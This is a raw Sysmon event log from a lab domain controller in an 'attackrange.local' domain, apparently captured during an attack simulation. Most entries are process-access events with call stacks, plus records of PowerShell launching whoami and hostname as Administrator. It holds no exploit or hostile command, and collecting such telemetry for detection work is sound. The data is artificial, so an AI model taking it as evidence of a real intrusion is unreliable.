16:50:00.621{29E67E80-859E-6019-7005-00000000A301}41846780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{29E67E80-D438-601A-3B30-00000000A301}4188C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+141132a9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b4133(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b3e04(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+14065469(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+1357499a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135d2e69(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b635f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135a82e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b4817(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b43b3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b4133(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b3e04(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+14065469(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+1357499a(wow64) 154100x8000000000000000180015Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:00.630{29E67E80-D438-601A-3B30-00000000A301}4188C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\ATTACKRANGE\Administrator{29E67E80-84F5-6019-88B2-2E0000000000}0x2eb2882HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{29E67E80-859E-6019-7005-00000000A301}4184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x8000000000000000180014Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:00.621{29E67E80-859E-6019-7105-00000000A301}53601944C:\Windows\system32\conhost.exe{29E67E80-D438-601A-3A30-00000000A301}2728C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180013Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:00.606{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180012Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:00.606{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180011Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:00.606{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180010Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:00.606{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180009Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:00.606{29E67E80-84F4-6019-2C05-00000000A301}19281400C:\Windows\system32\csrss.exe{29E67E80-D438-601A-3A30-00000000A301}2728C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000180008Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:00.606{29E67E80-859E-6019-7005-00000000A301}41846780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{29E67E80-D438-601A-3A30-00000000A301}2728C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+141132a9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b4133(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b3e04(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+14065469(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+1357499a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135d2e69(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b635f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135a82e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b4817(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b43b3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b4133(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b3e04(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+14065469(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+1357499a(wow64) 154100x8000000000000000180007Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:00.615{29E67E80-D438-601A-3A30-00000000A301}2728C:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\ATTACKRANGE\Administrator{29E67E80-84F5-6019-88B2-2E0000000000}0x2eb2882HighMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E{29E67E80-859E-6019-7005-00000000A301}4184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x8000000000000000180023Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:10.090{29E67E80-7CBD-6019-0B00-00000000A301}8565160C:\Windows\system32\lsass.exe{29E67E80-7CBB-6019-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x8000000000000000180025Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:26.933{29E67E80-7CBF-6019-1400-00000000A301}12521952C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180024Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:26.933{29E67E80-84F6-6019-3B05-00000000A301}31764480C:\Windows\system32\taskhostw.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180031Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:27.245{29E67E80-7CBF-6019-1600-00000000A301}15281824C:\Windows\system32\svchost.exe{29E67E80-D453-601A-3C30-00000000A301}4428C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180030Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:27.245{29E67E80-7CBF-6019-1600-00000000A301}15281572C:\Windows\system32\svchost.exe{29E67E80-D453-601A-3C30-00000000A301}4428C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180029Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:27.230{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-D453-601A-3C30-00000000A301}4428C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180028Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:27.230{29E67E80-84F4-6019-2C05-00000000A301}19281400C:\Windows\system32\csrss.exe{29E67E80-D453-601A-3C30-00000000A301}4428C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000180027Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:27.230{29E67E80-7CBD-6019-0500-00000000A301}6402196C:\Windows\system32\csrss.exe{29E67E80-D453-601A-3C30-00000000A301}4428C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000180026Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:27.230{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-D453-601A-3C30-00000000A301}4428C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180056Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:32.870{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180055Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:32.870{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180054Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:32.870{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180053Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:32.870{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180052Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:32.870{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180051Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:32.870{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180050Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 